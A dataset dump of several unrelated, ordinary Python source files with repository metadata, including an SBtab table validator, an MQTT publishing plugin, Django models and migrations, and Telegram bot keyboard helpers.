"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
class AwaitableGetServiceResult(GetServiceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetServiceResult(
auth_options=self.auth_options,
disable_local_auth=self.disable_local_auth,
encryption_with_cmk=self.encryption_with_cmk,
hosting_mode=self.hosting_mode,
id=self.id,
identity=self.identity,
location=self.location,
name=self.name,
network_rule_set=self.network_rule_set,
partition_count=self.partition_count,
private_endpoint_connections=self.private_endpoint_connections,
provisioning_state=self.provisioning_state,
public_network_access=self.public_network_access,
replica_count=self.replica_count,
shared_private_link_resources=self.shared_private_link_resources,
sku=self.sku,
status=self.status,
status_details=self.status_details,
tags=self.tags,
type=self.type)
def get_service(resource_group_name: Optional[str] = None,
search_service_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetServiceResult:
"""
Gets the search service with the given name in the given resource group.
Azure REST API version: 2022-09-01.
:param str resource_group_name: The name of the resource group within the current subscription. You can obtain this value from the Azure Resource Manager API or the portal.
:param str search_service_name: The name of the Azure Cognitive Search service associated with the specified resource group.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['searchServiceName'] = search_service_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:search:getService', __args__, opts=opts, typ=GetServiceResult).value
return AwaitableGetServiceResult(
auth_options=pulumi.get(__ret__, 'auth_options'),
disable_local_auth=pulumi.get(__ret__, 'disable_local_auth'),
encryption_with_cmk=pulumi.get(__ret__, 'encryption_with_cmk'),
hosting_mode=pulumi.get(__ret__, 'hosting_mode'),
id=pulumi.get(__ret__, 'id'),
identity=pulumi.get(__ret__, 'identity'),
location=pulumi.get(__ret__, 'location'),
name=pulumi.get(__ret__, 'name'),
network_rule_set=pulumi.get(__ret__, 'network_rule_set'),
partition_count=pulumi.get(__ret__, 'partition_count'),
private_endpoint_connections=pulumi.get(__ret__, 'private_endpoint_connections'),
provisioning_state=pulumi.get(__ret__, 'provisioning_state'),
public_network_access=pulumi.get(__ret__, 'public_network_access'),
replica_count=pulumi.get(__ret__, 'replica_count'),
shared_private_link_resources=pulumi.get(__ret__, 'shared_private_link_resources'),
sku=pulumi.get(__ret__, 'sku'),
status=pulumi.get(__ret__, 'status'),
status_details=pulumi.get(__ret__, 'status_details'),
tags=pulumi.get(__ret__, 'tags'),
type=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_service)
def get_service_output(resource_group_name: Optional[pulumi.Input[str]] = None,
search_service_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetServiceResult]:
"""
Gets the search service with the given name in the given resource group.
Azure REST API version: 2022-09-01.
:param str resource_group_name: The name of the resource group within the current subscription. You can obtain this value from the Azure Resource Manager API or the portal.
:param str search_service_name: The name of the Azure Cognitive Search service associated with the specified resource group.
"""
...
| UTF-8 | Python | false | false | 16,655 | py | 13,948 | get_service.py | 5,665 | 0.668388 | 0.665866 | 0 | 328 | 49.777439 | 909 |
karthikpappu/pyc_source | 11,304,353,948,664 | 095a3e6a503878f9b0205ad9aaf7032b01ed20e8 | 91fa095f423a3bf47eba7178a355aab3ca22cf7f | /pycfiles/sbtab-0.9.73.tar/validatorSBtab.cpython-35.py | 24788f1ea5ddd752cc640b91ea8cd76f5f74f60d | []
| no_license | https://github.com/karthikpappu/pyc_source | 0ff4d03e6d7f88c1aca7263cc294d3fa17145c9f | 739e7e73180f2c3da5fd25bd1304a3fecfff8d6e | refs/heads/master | 2023-02-04T11:27:19.098827 | 2020-12-27T04:51:17 | 2020-12-27T04:51:17 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.5 (3350)
# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04)
# [GCC 8.4.0]
# Embedded file name: /home/timo/Desktop/projects/SBtab/pypi_installer/sbtab/validatorSBtab.py
# Compiled at: 2018-10-25 03:40:01
# Size of source mod 2**32: 14710 bytes
"""
SBtab Validator
===============
Python script that validates SBtab files
See specification for further information.
"""
try:
from . import SBtab
from . import misc
except:
import SBtab, misc
import re, collections, sys, os
class SBtabError(Exception):
__doc__ = '\n Base class for errors in the SBtab validation class.\n '
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class ValidateTable:
__doc__ = '\n Validates SBtab file and SBtab object.\n '
def __init__(self, sbtab, def_table=None):
"""
Initialises validator and starts check for file and table format.
Parameters
----------
table: SBtab object
SBtab data file as SBtab object
sbtab_name: str
File path of the SBtab data file
def_table: SBtab object
SBtab definition table as SBtab object
"""
self.warnings = []
self.sbtab = sbtab
self.filename = sbtab.filename
self.read_definition(def_table)
self.allowed_table_types = list(set([row[2] for row in self.definitions[2:][0]]))
self.allowed_columns = {}
for table_type in self.allowed_table_types:
self.allowed_columns[table_type] = [row[0] for row in self.definitions[2:][0] if row[2] == table_type]
self.check_general_format()
self.column2format = {}
defs = self.definitions[2]
for row in defs:
if row[2] == self.sbtab.table_type:
self.column2format[row[0]] = row[3]
columns = []
for element in self.sbtab.columns:
if element == '':
pass
else:
columns.append(element)
self.sbtab.columns = columns
self.check_table_content()
def read_definition(self, def_table):
"""
read the required definition file; either it is provided by the user
or the default definition file is read in; otherwise program exit
"""
if def_table:
try:
self.sbtab_def = def_table
self.definitions = self.sbtab_def.create_list()
except:
print('Definition file could not be loaded, so the validationcould not be started. Please provide definition fileas argument')
sys.exit()
try:
path_ = os.path.join(os.path.dirname(__file__), '../definition_table/definitions.tsv')
def_file = open(path_, 'r')
def_table = def_file.read()
self.sbtab_def = SBtab.SBtabTable(def_table, 'definitions.tsv')
self.definitions = self.sbtab_def.create_list()
def_file.close()
except:
print('Definition file could not be loaded, so the validation\n could not be started. Please provide definition file\n as argument')
sys.exit()
def check_general_format(self):
"""
Validates format of SBtab file, checks file format and header row.
"""
header = self.sbtab.header_row
quotes = [
'"', 'â\x80\x9d', 'â\x80\x98', 'â\x80\x99',
'â\x80\x9b', 'â\x80\x9c', 'â\x80\x9f',
'â\x80²', 'â\x80³', 'â\x80´',
'â\x80µ', 'â\x80¶', 'â\x80·']
for quote in quotes:
try:
header = header.replace(quote, "'")
except:
pass
if not header.startswith('!!'):
self.warnings.append('Error: The header row of the table does not\n start with "!!SBtab". This file cannot be v\n alidated.')
if not re.search("TableType='([^']*)'", header):
self.warnings.append('Error: The attribute TableType is not defin\n ed in the SBtab table; This file cannot be\n validated.')
if not re.search("TableName='([^']*)'", header):
self.warnings.append('Warning: The (optional) attribute TableName\n is not defined in the SBtab table.')
for column in self.sbtab.columns:
if not column.startswith('!') and column != '':
self.warnings.append('Warning: Column %s does not start with\n an exclamation mark. It will not be processed.' % column)
if len(self.sbtab.value_rows) < 1:
self.warnings.append('Warning: Column %s does not start with\n an exclamation mark. It will not be processed.' % column)
for vr in self.sbtab.value_rows:
if len(vr) != len(self.sbtab.columns):
self.warnings.append('Warning: The length of row %s does notcorrespond to the amount of columns,which is %s.' % (
vr, len(self.sbtab.columns)))
def check_table_content(self):
"""
Validates the mandatory format of the SBtab in accordance to the
TableType attribute.
"""
if self.sbtab.table_type not in self.allowed_table_types:
self.warnings.append('Warning: The SBtab file has an invalid TableType in its header: %s. Thus, the validity of its columns cannot be checked' % self.sbtab.table_type)
return
unique = []
for row in self.sbtab.value_rows:
try:
identifier = row[self.sbtab.columns_dict['!ID']]
except:
break
if identifier not in unique:
unique.append(identifier)
else:
warning = 'Warning: There is an identifier that is not unique. Please change that: %s' % identifier
self.warnings.append(warning)
try:
int(identifier[0])
self.warnings.append('Warning: There is an identifier that starts with a digit; this is not permitted for the SBML conversion:%s' % identifier)
except:
pass
if self.sbtab.table_type == 'Reaction' and '!ReactionFormula' not in self.sbtab.columns_dict:
ident = False
for it in self.sbtab.columns_dict:
if it.startswith('!Identifier'):
ident = True
break
if not ident:
warning = 'Error: A Reaction SBtab needs at least a column !ReactionFormula or an !Identifier column tobe characterised.'
self.warnings.append(warning)
if self.sbtab.table_type == 'Quantity' and '!Unit' not in self.sbtab.columns_dict:
warning = 'Error: A Quantity SBtab requires the column "Unit". Please add this column to the SBtab file.'
self.warnings.append(warning)
for column in self.sbtab.columns:
if column.replace('!', '') not in self.allowed_columns[self.sbtab.table_type] and 'Identifiers:' not in column and 'ID:urn.' not in column:
self.warnings.append('Warning: The SBtab file has an unknown column: %s.\nPlease use only supported column types!' % column)
for row in self.sbtab.value_rows:
if '!ID' in self.sbtab.columns_dict and (str(row[self.sbtab.columns_dict['!ID']]).startswith('+') or str(row[self.sbtab.columns_dict['!ID']]).startswith('-')):
self.warnings.append('Warning: An identifier for a data row must not begin with "+" or "-": \n%s' % row)
if '!ReactionFormula' in self.sbtab.columns_dict and '<=>' not in row[self.sbtab.columns_dict['!ReactionFormula']]:
warning = 'There is a sum formula that does not adhere to the sum formula syntax from the SBtab specification: %s' % str(row[self.sbtab.columns_dict['!ReactionFormula']])
self.warnings.append(warning)
for i, entry in enumerate(row):
if entry == '':
pass
else:
if self.sbtab.columns[i][1:].startswith('Identifier'):
req_format = 'string'
else:
try:
req_format = self.column2format[self.sbtab.columns[i][1:]]
except:
continue
if req_format == 'Boolean':
if entry != 'True' and entry != 'False' and entry != 'TRUE' and entry != 'FALSE' and entry != '0' and entry != '1':
warning = 'Warning: The column %s holds a value that does not conform with the assigned column format %s: %s' % (
self.sbtab.columns[i][1:],
req_format, entry)
self.warnings.append(warning)
elif req_format == 'float':
try:
float(entry)
except:
warning = 'Warning: The column %s holds a value that does not conform with the assigned column format %s: %s' % (
self.sbtab.columns[i][1:],
req_format, entry)
self.warnings.append(warning)
elif req_format == '{+,-,0}' and entry != '+' and entry != '-' and entry != '0':
warning = 'Warning: The column %s holds a value that does not conform with the assigned column format %s: %s' % (
self.sbtab.columns[i][1:],
req_format, entry)
self.warnings.append(warning)
for column in collections.Counter(self.sbtab.columns).items():
if column[1] > 1:
self.warnings.append('Warning: There was a duplicate column i\n n this SBtab file. Please remove it:\n %s' % str(column[0]))
def return_output(self):
"""
Returns the warnings from the validation process.
"""
return self.warnings
class ValidateDocument:
__doc__ = '\n Validates SBtabDocument object\n '
def __init__(self, sbtab_doc, def_table=None):
"""
Initialises validator and starts check for file and table format.
Parameters
----------
sbtab_doc:
SBtabDocument object
"""
self.sbtab_doc = sbtab_doc
self.sbtab_def = def_table
def validate_document(self):
"""
validate SBtabDocument
"""
warnings = []
for sbtab in self.sbtab_doc.sbtabs:
warnings_s = [
'Warnings for %s:\n' % sbtab.filename]
self.vt = ValidateTable(sbtab, self.sbtab_def)
try:
warnings_s.append(self.vt.return_output())
except:
raise SBtabError('SBtab %s cannot be validated.' % sbtab.filename)
warnings.append(warnings_s)
return warnings
if __name__ == '__main__':
try:
sys.argv[1]
except:
print('You have not provided input arguments. Please start the script\n by also providing an SBtab file and the required definition f\n ile: >python validatorSBtab.py SBtab.csv definition.tsv')
sys.exit()
file_name = sys.argv[1]
sbtab_file_o = open(file_name, 'r')
sbtab_file = sbtab_file_o.read()
sbtab_file_o.close()
delimiter = misc.getDelimiter(sbtab_file)
try:
default_def = sys.argv[2]
def_file = open(default_def, 'r')
def_tab = def_file.read()
def_file.close()
except:
def_tab = None
validator_output = []
Validate_file_class = ValidateFile(sbtab_file, file_name)
validator_output.append(Validate_file_class.return_output())
Validate_table_class = ValidateTable(sbtab_file, file_name, def_tab)
validator_output.append(Validate_table_class.return_output())
warned = False
for warning in validator_output:
if warning != []:
print('WARNINGS: ', warning)
warned = True
if not warned:
print('The SBtab file is valid.') | UTF-8 | Python | false | false | 12,442 | py | 114,545 | validatorSBtab.cpython-35.py | 111,506 | 0.553445 | 0.544189 | 0.001449 | 292 | 41.55137 | 229 |
enterpriseih/easyTest | 3,109,556,322,815 | 749e13db8574478b989fc76c182f9c80f6242b46 | 24c5c46f1d281fc15de7f6b72a5148ae85f89fb4 | /SRC/demo/基础实例/part23.py | b784897027abd7b3694db8a5915064205faed712 | []
| no_license | https://github.com/enterpriseih/easyTest | 22d87c7ffe40fb10a07f7c5cdd505f63dd45adc0 | 43b8d294e898f25055c78313cfece2753352c250 | refs/heads/master | 2023-08-23T22:55:14.798341 | 2020-02-11T09:13:43 | 2020-02-11T09:13:43 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 题目:打印出如下图案(菱形):
# *
# ***
# *****
# *******
# *****
# ***
# *
# print('%*s'%(4,'*'))
# print('%*s'%(5,'*'*3))
# print('%*s'%(6,'*'*5))
# print('%*s'%(7,'*'*7))
def printPic(maxLineNumber):
if maxLineNumber%2==0:
return
start=(maxLineNumber+1)//2
index=0
for x in range(start,maxLineNumber+1):
index += 1
print('%*s'%(x,'*'*(2*index-1)))
for x in range(maxLineNumber-1,start-1,-1):
index -= 1
print('%*s' % (x, '*' * (2 * index - 1)))
printPic(101) | UTF-8 | Python | false | false | 510 | py | 169 | part23.py | 160 | 0.473029 | 0.421162 | 0 | 30 | 15.1 | 44 |
shivvignesh/Twitterclone | 16,733,192,630,567 | bd9228c1430de538cedc7565bbf01415e2ab2f28 | 1f048eff65c3c50033a76ade764992ac824b78c4 | /core/admin.py | 0248b0f785bc80640ad930bd0f69317b42b5b444 | []
| no_license | https://github.com/shivvignesh/Twitterclone | 9d1a0dff77b11aefdabcddc5af3900ce9b9290b0 | 9b2d508500f189e92cdfa768d7a65e4513a6ca29 | refs/heads/master | 2020-03-29T03:08:50.620034 | 2018-10-06T12:25:12 | 2018-10-06T12:25:12 | 149,469,130 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from core.models import Profile
# Register your models here.
class ProfileAdmin(admin.ModelAdmin):
list_display=['user','about','dob']
search_field=['user']
admin.site.register(Profile,ProfileAdmin)
| UTF-8 | Python | false | false | 237 | py | 20 | admin.py | 15 | 0.772152 | 0.772152 | 0 | 9 | 25.222222 | 41 |
jiaoyinyi/game_server | 17,738,214,936,575 | 3ffd68018fa254e3ceb8c32b74ec57ff7a73229c | 005b3f4538cf787bd82f043d3156e6662786fc4f | /script/xparser.py | fbb3b7980919320112b7c7a0513cf5c2fe64ac5e | [
"Apache-2.0"
]
| permissive | https://github.com/jiaoyinyi/game_server | 33b7a4fb7d52485063e2922eee8cc8195c7e1f20 | e39bf199dc478e10d88ed63be92fc00589ec4eb0 | refs/heads/master | 2020-07-03T15:50:02.081877 | 2019-10-09T13:12:07 | 2019-10-09T13:12:07 | 201,957,654 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import xlrd
# 读取xls文件,取出配置,第一行是中文提示,第二行是字段名,第三行以下是数据
# 输入一个文件名
# 输出解析好的数据 结构是[{},,,{}] 字典列表
def get_datas(file):
table = open_file(file)
check_table(table)
return parser(table)
# 打开文件,返回第一个sheet表格
def open_file(file):
f = xlrd.open_workbook(file)
table = f.sheets()[0]
return table
# 验证表格是否有数据
def check_table(table):
if table.nrows >= 2:
return True
else:
raise Exception("rows num error")
# 解析
def parser(table):
descs = table.row_values(0)
field_names = table.row_values(1)
total_row_num = table.nrows
datas = []
for row in range(2, total_row_num):
data = {}
values = table.row_values(row)
for field_index in range(len(field_names)):
try:
data[field_names[field_index]] = values[field_index]
except:
data[field_names[field_index]] = ""
datas.append(data)
return descs, datas
| UTF-8 | Python | false | false | 1,153 | py | 57 | xparser.py | 4 | 0.588117 | 0.582075 | 0 | 49 | 19.265306 | 68 |
JuanesKill/Listas-Haskell | 6,511,170,436,150 | 20fca1ddf3e55fa31402c438892f1143fc7e75f1 | f42a92268d8fe503ebdceb00bd4fe0be5efb59b9 | /sumadigitospares.py | 5a1c5241f690093638fce8cb3721d76e60a6a635 | []
| no_license | https://github.com/JuanesKill/Listas-Haskell | cae0ba269534152f7b13da751ccf6d8efe9a55a8 | 95df3f3d3cca40b963d48f671a204b59160df14a | refs/heads/master | 2021-01-19T08:05:16.354312 | 2017-04-08T01:47:13 | 2017-04-08T01:47:13 | 87,599,631 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def SumaDigitosPares(n):
if(n==0):
return (0)
else:
if(n%2==0):
return n%10+SumaDigitosPares(n/10)
else:
return SumaDigitosPares(n/10)
print SumaDigitosPares(21111)
| UTF-8 | Python | false | false | 275 | py | 3 | sumadigitospares.py | 1 | 0.447273 | 0.392727 | 0 | 12 | 21.916667 | 47 |
mrbertadams/platypush | 12,189,117,216,102 | d3b5a4581a9e35c231472cf79a1ba72fff1a22ce | 9484419e70b955a4e5e6a77b0d1ff1afadcca524 | /platypush/plugins/mqtt.py | e6a4e5cc83ddff52b6378afe35f87ee412722856 | [
"MIT"
]
| permissive | https://github.com/mrbertadams/platypush | 301638134a652fa42e0300386abe80ec140d9ebe | e880f004983810702b5732a88c2801201a818299 | refs/heads/master | 2020-12-05T13:00:34.698973 | 2020-01-06T14:24:52 | 2020-01-06T14:24:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import os
from platypush.message import Message
from platypush.plugins import Plugin, action
class MqttPlugin(Plugin):
"""
This plugin allows you to send custom message to a message queue compatible
with the MQTT protocol, see http://mqtt.org/
"""
def __init__(self, host=None, port=1883, tls_cafile=None,
tls_certfile=None, tls_keyfile=None,
tls_version=None, tls_ciphers=None, username=None,
password=None, *args, **kwargs):
"""
:param host: If set, MQTT messages will by default routed to this host unless overridden in `send_message` (default: None)
:type host: str
:param port: If a default host is set, specify the listen port (default: 1883)
:type port: int
:param tls_cafile: If a default host is set and requires TLS/SSL, specify the certificate authority file (default: None)
:type tls_cafile: str
:param tls_certfile: If a default host is set and requires TLS/SSL, specify the certificate file (default: None)
:type tls_certfile: str
:param tls_keyfile: If a default host is set and requires TLS/SSL, specify the key file (default: None)
:type tls_keyfile: str
:param tls_version: If a default host is set and requires TLS/SSL, specify the minimum TLS supported version (default: None)
:type tls_version: str
:param tls_ciphers: If a default host is set and requires TLS/SSL, specify the supported ciphers (default: None)
:type tls_ciphers: str
:param username: If a default host is set and requires user authentication, specify the username ciphers (default: None)
:type username: str
:param password: If a default host is set and requires user authentication, specify the password ciphers (default: None)
:type password: str
"""
super().__init__(*args, **kwargs)
self.host = host
self.port = port
self.username = username
self.password = password
self.tls_cafile = os.path.abspath(os.path.expanduser(tls_cafile)) \
if tls_cafile else None
self.tls_certfile = os.path.abspath(os.path.expanduser(tls_certfile)) \
if tls_certfile else None
self.tls_keyfile = os.path.abspath(os.path.expanduser(tls_keyfile)) \
if tls_keyfile else None
self.tls_version = tls_version
self.tls_ciphers = tls_ciphers
@action
def send_message(self, topic, msg, host=None, port=1883, tls_cafile=None,
tls_certfile=None, tls_keyfile=None,
tls_version=None, tls_ciphers=None, username=None,
password=None, *args, **kwargs):
"""
Sends a message to a topic/channel.
:param topic: Topic/channel where the message will be delivered
:type topic: str
:param msg: Message to be sent. It can be a list, a dict, or a Message object
:param host: MQTT broker hostname/IP
:type host: str
:param port: MQTT broker port (default: 1883)
:type port: int
:param tls_cafile: If TLS/SSL is enabled on the MQTT server and the certificate requires a certificate authority to authenticate it, `ssl_cafile` will point to the provided ca.crt file (default: None)
:type tls_cafile: str
:param tls_certfile: If TLS/SSL is enabled on the MQTT server and a client certificate it required, specify it here (default: None)
:type tls_certfile: str
:param tls_keyfile: If TLS/SSL is enabled on the MQTT server and a client certificate key it required, specify it here (default: None)
:type tls_keyfile: str
:param tls_version: If TLS/SSL is enabled on the MQTT server and it requires a certain TLS version, specify it here (default: None)
:type tls_version: str
:param tls_ciphers: If TLS/SSL is enabled on the MQTT server and an explicit list of supported ciphers is required, specify it here (default: None)
:type tls_ciphers: str
:param username: Specify it if the MQTT server requires authentication (default: None)
:type username: str
:param password: Specify it if the MQTT server requires authentication (default: None)
:type password: str
"""
import paho.mqtt.publish as publisher
if not host and not self.host:
raise RuntimeError('No host specified and no default host configured')
publisher_args = {
'hostname': host or self.host,
'port': port or self.port,
}
if host:
if username and password:
publisher_args['auth'] = {
'username': username,
'password': password,
}
else:
if self.username and self.password:
publisher_args['auth'] = {
'username': username,
'password': password,
}
if host:
if tls_cafile:
publisher_args['tls'] = { 'ca_certs': tls_cafile }
if tls_certfile:
publisher_args['tls']['certfile'] = tls_certfile
if tls_keyfile:
publisher_args['tls']['keyfile'] = tls_keyfile
if tls_version:
publisher_args['tls']['tls_version'] = tls_version
if tls_ciphers:
publisher_args['tls']['ciphers'] = tls_ciphers
else:
if self.tls_cafile:
publisher_args['tls'] = { 'ca_certs': self.tls_cafile }
if self.tls_certfile:
publisher_args['tls']['certfile'] = self.tls_certfile
if self.tls_keyfile:
publisher_args['tls']['keyfile'] = self.tls_keyfile
if self.tls_version:
publisher_args['tls']['tls_version'] = self.tls_version
if self.tls_ciphers:
publisher_args['tls']['ciphers'] = self.tls_ciphers
try: msg = json.dumps(msg)
except: pass
try: msg = Message.build(json.loads(msg))
except: pass
publisher.single(topic, str(msg), **publisher_args)
# vim:sw=4:ts=4:et:
| UTF-8 | Python | false | false | 6,344 | py | 7 | mqtt.py | 3 | 0.598203 | 0.595366 | 0 | 162 | 38.154321 | 208 |
Shershebnev/SDCND | 14,362,370,680,966 | 7c50e751ae12724d47ac437f24c6636a2f415e7a | 0d83640f61c9d9a2abc84733b95931d3e749c0e0 | /term1/project5/heatmap.py | 4e0d23e111e83e0c5b2685e112b4822c627a2b37 | []
| no_license | https://github.com/Shershebnev/SDCND | 57f1870cc7dfe3ddfe99ed7c332b813cf0433e63 | f1e1d9a02adde01c38727102b6436fc4ce38ee69 | refs/heads/master | 2021-05-01T15:49:28.657444 | 2018-05-26T03:55:37 | 2018-05-27T15:18:29 | 121,038,006 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from collections import deque
import numpy as np
class Heatmap:
"""Class for storing heatmaps from the previous frames
"""
def __init__(self, n_last_heatmaps=3):
"""init
:param n_last_heatmaps: size of frame memory
"""
self.queue = deque(maxlen=n_last_heatmaps)
def sum_heatmap(self):
"""Sum all stored heatmaps
:return: total heatmap as numpy array
"""
return np.array(self.queue).sum(axis=0) | UTF-8 | Python | false | false | 480 | py | 16 | heatmap.py | 10 | 0.60625 | 0.602083 | 0 | 22 | 20.863636 | 58 |
elmiomar/testbed | 18,906,446,053,941 | a5d3c8e4692ffc7d7bde12445dc2fe27e92b0a31 | 94876d26987e31ddc3a939fe02d2150407b00903 | /MainApp/migrations/0004_sensor_xsensoriotcomponent.py | bab6dd7c334f63bec000d096bc14eaad1856fc2f | []
| no_license | https://github.com/elmiomar/testbed | cc5e96f9bb131f232344136b9680215cb65f8c32 | b347cdc0f7f13ddaef45fb633ba44cef315e0b0c | refs/heads/master | 2023-02-25T08:20:48.660433 | 2021-01-25T22:52:37 | 2021-01-25T22:52:37 | 332,906,553 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.0.2 on 2020-02-03 19:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('MainApp', '0003_iotcomponent_topic'),
]
operations = [
migrations.CreateModel(
name='Sensor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='', max_length=255)),
('created_date', models.DateTimeField(auto_now_add=True)),
('deleted_date', models.DateTimeField(null=True)),
],
),
migrations.CreateModel(
name='XSensorIOTComponent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pin_number', models.IntegerField(null=True)),
('created_date', models.DateTimeField(auto_now_add=True)),
('deleted_date', models.DateTimeField(null=True)),
('iot_component', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='MainApp.IOTComponent')),
('sensor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='MainApp.Sensor')),
],
),
]
| UTF-8 | Python | false | false | 1,380 | py | 66 | 0004_sensor_xsensoriotcomponent.py | 64 | 0.586232 | 0.57029 | 0 | 34 | 39.588235 | 125 |
timegambler/-wechatScrapy | 8,383,776,180,279 | d031948d8b583d499d4456798adb0ac8dfb65bdf | bbef5ac140bdfe36e68ae776dfae3cb36a86417d | /run/spidertool/workspace/officialAccountSpiders/items.py | 8adff8792e5d49dade4ead0552915085db8b4d90 | []
| no_license | https://github.com/timegambler/-wechatScrapy | 2fa43f47ca2472b0c86791710e148917712bbb69 | 8afa427901dd5a25d8192a2b960acf8f9dc4e835 | refs/heads/master | 2020-04-24T22:23:54.871189 | 2019-02-24T08:13:41 | 2019-02-24T08:13:41 | 172,310,508 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class officialAccountItem(scrapy.Item):
nickname = scrapy.Field() # 公众号名称
article_title = scrapy.Field() # 文章标题
article_updatetime = scrapy.Field() # 发布时间
article_link = scrapy.Field() # 文章链接
crawl_time = scrapy.Field() # 爬取时间
| UTF-8 | Python | false | false | 463 | py | 8 | items.py | 7 | 0.67696 | 0.674584 | 0 | 15 | 27 | 52 |
sot/mica | 8,194,797,629,318 | e6f1e9bf58d2d3dded87d80d441a0847e184c1d1 | f839a5b4025952684d72194ee93aa946388d88cd | /scripts/update_guide_stats.py | 28a7388082b407d5638339983ae9162359b8eac7 | [
"BSD-3-Clause"
]
| permissive | https://github.com/sot/mica | f0bf217b707d30e62a32f91e40de806f7b8faca3 | 6f9a7831f22d6797d51e494377ad18279879a0ed | refs/heads/master | 2023-08-31T04:27:39.853169 | 2023-08-22T14:02:12 | 2023-08-22T14:02:12 | 3,139,571 | 0 | 0 | BSD-3-Clause | false | 2023-08-07T13:17:47 | 2012-01-09T19:58:08 | 2021-11-29T16:26:17 | 2023-08-07T13:02:19 | 2,223 | 3 | 0 | 42 | Python | false | false | #!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import os
import argparse
from mica.stats import update_guide_stats
import mica.stats.guide_stats
# Cheat and pass options directly. Needs entrypoint scripts
opt = argparse.Namespace(datafile=mica.stats.guide_stats.TABLE_FILE,
obsid=None, check_missing=False, start=None, stop=None)
update_guide_stats.update(opt)
table_file = mica.stats.guide_stats.TABLE_FILE
file_stat = os.stat(table_file)
if file_stat.st_size > 200e6:
print("""
Warning: {tfile} is larger than 200MB and may need
Warning: to be manually repacked (i.e.):
Warning:
Warning: ptrepack --chunkshape=auto --propindexes --keep-source-filters {tfile} compressed.h5
Warning: cp compressed.h5 {tfile}
""".format(tfile=table_file))
| UTF-8 | Python | false | false | 813 | py | 103 | update_guide_stats.py | 70 | 0.738007 | 0.725707 | 0 | 25 | 31.52 | 93 |
borissimkin/moneykeeper-bot | 10,539,849,747,751 | 8e2aa211096a7b1389f52efb4721b231b09e3356 | a137d3f7c5956f659c8ce356aac52e22906fbc28 | /bot/conversations/limits/keyboards.py | 3a4c22d09fd05f41b51782f6a7ae94c52ce04f3b | [
"MIT"
]
| permissive | https://github.com/borissimkin/moneykeeper-bot | 33c19d127b34598d54653f0ae05f1999e264e5d7 | 45f7ed92be187db71d28c5326a5b62cb587c88bf | refs/heads/master | 2022-12-07T21:20:15.619429 | 2020-04-17T10:58:30 | 2020-04-17T10:58:30 | 231,085,939 | 2 | 0 | MIT | false | 2022-11-22T05:25:04 | 2019-12-31T12:33:45 | 2022-01-21T13:00:28 | 2022-11-22T05:25:01 | 175 | 1 | 0 | 2 | Python | false | false | from telegram import ReplyKeyboardMarkup
from bot import config
from bot.buttons import Buttons
from bot.keyboards import make_buttons_for_choose_category, row_is_full
from bot.utils import add_button_exit, add_buttons_exit_and_back
text_button_daily = 'Суточный'
text_button_weekly = 'Недельный'
text_button_monthly = 'Месячный'
text_button_general_category = 'По всем категориям'
text_button_type = 'Тип'
text_button_category = 'Категория'
text_button_amount_money = 'Количество денег'
keyboard_main_menu_limits_exist = ReplyKeyboardMarkup(add_button_exit([[Buttons.add, Buttons.delete],
[Buttons.edit]]), resize_keyboard=True)
keyboard_main_menu_limits_non_exist = ReplyKeyboardMarkup(add_button_exit([[Buttons.add]]), resize_keyboard=True)
keyboard_choose_type_limit = ReplyKeyboardMarkup(add_buttons_exit_and_back([[text_button_daily, text_button_weekly],
[text_button_monthly]]),
resize_keyboard=True)
keyboard_choose_action_edit = ReplyKeyboardMarkup(add_buttons_exit_and_back([[text_button_type, text_button_category,
text_button_amount_money]]),
resize_keyboard=True)
def get_keyboard_category_limit(categories):
keyboard_categories = make_buttons_for_choose_category(config['buttons_per_row'], categories)
keyboard_categories.insert(0, [text_button_general_category])
return ReplyKeyboardMarkup(add_buttons_exit_and_back(keyboard_categories),
resize_keyboard=True)
def get_keyboard_main_menu(limits):
return keyboard_main_menu_limits_exist if limits else keyboard_main_menu_limits_non_exist
def make_keyboard_choose_limits(ids_limits: dict):
buttons = make_buttons_for_choose_limits(4, list(ids_limits.keys()))
return ReplyKeyboardMarkup(add_buttons_exit_and_back(buttons), resize_keyboard=True)
def make_buttons_for_choose_limits(count_buttons_per_row, ids):
buttons = []
row = []
for index, category in enumerate(ids):
row.append(str(category))
if row_is_full(index, count_buttons_per_row):
buttons.append(row)
row = []
if row:
buttons.append(row)
return buttons
| UTF-8 | Python | false | false | 2,506 | py | 89 | keyboards.py | 85 | 0.639459 | 0.638638 | 0 | 57 | 41.736842 | 117 |
